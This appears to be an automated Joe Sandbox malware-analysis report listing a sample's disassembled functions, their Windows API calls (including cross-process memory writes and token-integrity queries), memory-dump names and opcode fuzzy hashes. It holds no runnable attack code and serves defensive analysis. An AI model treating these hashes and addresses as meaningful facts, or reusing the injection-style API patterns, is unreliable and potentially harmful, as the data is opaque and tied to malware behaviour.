                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: 38364f2b67b51a08fbf3699cbc37115d2f10bcb7ce790e2c0d2aa9db7a8e20e4
                                                                                        • Instruction ID: b954b90d5c7d9adf3a324ea5bc55027e122337d89e6fae98e25b4a3fa1ffbafc
                                                                                        • Opcode Fuzzy Hash: 38364f2b67b51a08fbf3699cbc37115d2f10bcb7ce790e2c0d2aa9db7a8e20e4
                                                                                        • Instruction Fuzzy Hash: 4E014B74210208AFDB205FE6DC59D6F7BADEF89754B200569F949C3260DF31DC10CA60
                                                                                        Function 00B057FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B0581B
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B05829
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05831
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B0583B
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05877
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: ee935568bb4a4c52d5a473f1f6b85901433485b807c79c35529a2d51d9f93a8e
                                                                                        • Instruction ID: e8ff19ff52cbde479a5e9b693ebd87794f3b426ae0f82378bb6b1e93ac7c57f8
                                                                                        • Opcode Fuzzy Hash: ee935568bb4a4c52d5a473f1f6b85901433485b807c79c35529a2d51d9f93a8e
                                                                                        • Instruction Fuzzy Hash: 99013535C11A1D9BCF20AFA4E8989EEBBBCFF08711F108196E902B2580DF309550CBA1
                                                                                        Function 00AF7D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7C62,80070057,?,?,?,00AF8073), ref: 00AF7D45
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7C62,80070057,?,?), ref: 00AF7D60
                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7C62,80070057,?,?), ref: 00AF7D6E
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7C62,80070057,?), ref: 00AF7D7E
                                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7C62,80070057,?,?), ref: 00AF7D8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: 1ebfafab7f3ad90102c46bb6c6beb3db674025cbc9a3086831bebad6e0aa0043
                                                                                        • Instruction ID: be0d8ad42b4c117da50721ae404cfc9fb226adb16894c4a435d27e8945da94d1
                                                                                        • Opcode Fuzzy Hash: 1ebfafab7f3ad90102c46bb6c6beb3db674025cbc9a3086831bebad6e0aa0043
                                                                                        • Instruction Fuzzy Hash: 28017C76615219ABDB115F98DC44BBE7BBDEF44792F644068FA08D7210EB71ED00CBA0
                                                                                        Function 00AF8CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF8CDE
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF8CE8
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF8CF7
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF8CFE
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF8D14
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 528a126aba9e6ad2688ac1e69d27c763a0f1315b257df418368a79c34ee7c5e5
                                                                                        • Instruction ID: 36b8f636642f27e574a44b0ef8b88899821bec6073dea9fa433fc84f0383bd12
                                                                                        • Opcode Fuzzy Hash: 528a126aba9e6ad2688ac1e69d27c763a0f1315b257df418368a79c34ee7c5e5
                                                                                        • Instruction Fuzzy Hash: E0F08734210208BFEB102FE49CC8E7B3BACEF89B54B204029FA44C3190CE60AC00DB60
                                                                                        Function 00AF8D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8D3F
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D49
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D58
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D5F
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D75
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 958a5edb75b064a185f0970f37c82b7422e346e8df39ad3e8b9ddcbc56991775
                                                                                        • Instruction ID: b6534be76bfc1c99352c8d0ab3369d6045b74ac1796a960e65b12cabd1aa47ff
                                                                                        • Opcode Fuzzy Hash: 958a5edb75b064a185f0970f37c82b7422e346e8df39ad3e8b9ddcbc56991775
                                                                                        • Instruction Fuzzy Hash: 7FF08C34210208AFEB111FA4EC98F7B3BACEF49754F240115FA4483190CF609D00DA60
                                                                                        Function 00AFCD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00AFCD90
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00AFCDA7
                                                                                        • MessageBeep.USER32(00000000), ref: 00AFCDBF
                                                                                        • KillTimer.USER32(?,0000040A), ref: 00AFCDDB
                                                                                        • EndDialog.USER32(?,00000001), ref: 00AFCDF5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: b92d74fb2cf0515cc768e3df28cee2e3b2fca7ec3ae78714b05a8759fc0f943e
                                                                                        • Instruction ID: 965e3369cd1885d5f3ac3e91bbba4a1882afdcc875c1b00149f2ea667c841aeb
                                                                                        • Opcode Fuzzy Hash: b92d74fb2cf0515cc768e3df28cee2e3b2fca7ec3ae78714b05a8759fc0f943e
                                                                                        • Instruction Fuzzy Hash: 79018B3051070CABEB256B51DD5EBAA7B78FF00715F100669F682610D1DFF4A954CB80
                                                                                        Function 00AA178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 00AA179B
                                                                                        • StrokeAndFillPath.GDI32(?,?,00ADBBC9,00000000,?), ref: 00AA17B7
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AA17CA
                                                                                        • DeleteObject.GDI32 ref: 00AA17DD
                                                                                        • StrokePath.GDI32(?), ref: 00AA17F8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: 52027df402bc8738899f27ddc3b6bdc48159a85175a9a94086bcfc1f7d9f3863
                                                                                        • Instruction ID: 28e7c4a250f7c6d648dcf12f5d29439e541d405e65645b76281beb3fe09fda3b
                                                                                        • Opcode Fuzzy Hash: 52027df402bc8738899f27ddc3b6bdc48159a85175a9a94086bcfc1f7d9f3863
                                                                                        • Instruction Fuzzy Hash: 72F0EC30058708FBDB15AF26ED5C7593FA4AB0232AF148224F42A5B1F0CF794995DF50
                                                                                        Function 00B0C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00B0CA75
                                                                                        • CoCreateInstance.OLE32(00B33D3C,00000000,00000001,00B33BAC,?), ref: 00B0CA8D
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • CoUninitialize.OLE32 ref: 00B0CCFA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2683427295-24824748
                                                                                        • Opcode ID: 8b5b52d584a31136396520fba032127acf7ba9f7cd10cda93a7581edf641d80b
                                                                                        • Instruction ID: 5a27a8f02163fa2373a70cf8c04d067338b8d261d376d22f933f1707d8b206b5
                                                                                        • Opcode Fuzzy Hash: 8b5b52d584a31136396520fba032127acf7ba9f7cd10cda93a7581edf641d80b
                                                                                        • Instruction Fuzzy Hash: D3A14D71104205AFD300EF64C991EAFB7ECEF99714F40495DF155971A2EBB0EA09CBA2
                                                                                        Function 00AAE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0FE6: std::exception::exception.LIBCMT ref: 00AC101C
                                                                                          • Part of subcall function 00AC0FE6: __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AB1680: _memmove.LIBCMT ref: 00AB16DB
                                                                                        • __swprintf.LIBCMT ref: 00AAE598
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AAE431
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 1943609520-557222456
                                                                                        • Opcode ID: df82f3e83ae753078568aca5678108e9623926affdc897c694c9992c87c18a2d
                                                                                        • Instruction ID: 7f94291b05def2df252eaa25ef610232d8e031420c4a35a7f61fd6afbaccdadb
                                                                                        • Opcode Fuzzy Hash: df82f3e83ae753078568aca5678108e9623926affdc897c694c9992c87c18a2d
                                                                                        • Instruction Fuzzy Hash: 44919E719082419FC714EF24D9A5CAFB7F8EF96304F44491DF496972A2EB20EE44CB92
                                                                                        Function 00AC523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00AC52CD
                                                                                          • Part of subcall function 00AD0320: __87except.LIBCMT ref: 00AD035B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        • Opcode ID: 86b37678a6bd8157610ae108cab12f9580f2711b0ec7e6f74e4829c687b84340
                                                                                        • Instruction ID: a73762f29230f3c1a9a020d4948c40dbc512298199f69003400008bd0a8ae91a
                                                                                        • Opcode Fuzzy Hash: 86b37678a6bd8157610ae108cab12f9580f2711b0ec7e6f74e4829c687b84340
                                                                                        • Instruction Fuzzy Hash: E45157B1E09A0186CB11A734CA11FAE3BE4DB40750F31496EF4D38A3E5EE789CC49A46
                                                                                        Function 00AC0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #$+
                                                                                        • API String ID: 0-2552117581
                                                                                        • Opcode ID: 825fca8804ce94d9fb2edb75726d1dac124c8b230816d627917f851913dfc074
                                                                                        • Instruction ID: 233f5e3167ce48663061c85e72705867bea75f599bf5cea9aaf7d132d6dea2b1
                                                                                        • Opcode Fuzzy Hash: 825fca8804ce94d9fb2edb75726d1dac124c8b230816d627917f851913dfc074
                                                                                        • Instruction Fuzzy Hash: 50512375404249DFDF25EFA8C490EFA7BB4EF56310F144059F9919B291C734AD42CBA0
                                                                                        Function 00ABCF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$_memmove
                                                                                        • String ID: ERCP
                                                                                        • API String ID: 2532777613-1384759551
                                                                                        • Opcode ID: cbcc59c154720ff362f508ecbc31c89c40586828f08b11aaaad18a838fca7e31
                                                                                        • Instruction ID: 8d7a9833b8f1d5a139753f29b56b2ba0d0afa9ab697d2ebc286c655866b50d93
                                                                                        • Opcode Fuzzy Hash: cbcc59c154720ff362f508ecbc31c89c40586828f08b11aaaad18a838fca7e31
                                                                                        • Instruction Fuzzy Hash: 7151B3B1900309DFDB24DF65C881BEABBF9EF04311F2485AEE94ADB242E7309585CB40
                                                                                        Function 00AFA3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00B01CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AF9E4E,?,?,00000034,00000800,?,00000034), ref: 00B01CE5
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AFA3F7
                                                                                          • Part of subcall function 00B01C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AF9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00B01CB0
                                                                                          • Part of subcall function 00B01BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00B01C08
                                                                                          • Part of subcall function 00B01BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AF9E12,00000034,?,?,00001004,00000000,00000000), ref: 00B01C18
                                                                                          • Part of subcall function 00B01BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AF9E12,00000034,?,?,00001004,00000000,00000000), ref: 00B01C2E
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AFA464
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AFA4B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: 7e398cf1f357cb5fbfde693e2ed3b2309ddfa462469dc797de87d481bda383c4
                                                                                        • Instruction ID: a1bca3cf06398a824a7a1a16efee961de9e4153be8e0d9637af4d842b70a2bea
                                                                                        • Opcode Fuzzy Hash: 7e398cf1f357cb5fbfde693e2ed3b2309ddfa462469dc797de87d481bda383c4
                                                                                        • Instruction Fuzzy Hash: 6A41617290021CBFDB24DFA4CD85AEEBBB8EF45300F104495FA55B7181DA706E85CB61
                                                                                        Function 00B279FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B27A86
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B27A9A
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B27ABE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: cdee5810b1b8f4621efbaf399ce05d40812eafa55832e4800eb0b7a090a99c3b
                                                                                        • Instruction ID: 772ba9fb8085bef6916e9da05dae14586f8102513834c9691b20694907cba2bb
                                                                                        • Opcode Fuzzy Hash: cdee5810b1b8f4621efbaf399ce05d40812eafa55832e4800eb0b7a090a99c3b
                                                                                        • Instruction Fuzzy Hash: 4221B132650229AFDF118F54DC42FEE3BA9EF49724F110254FE196B1D0DAB1AC548B90
                                                                                        Function 00B281B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B2826F
                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B2827D
                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B28284
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
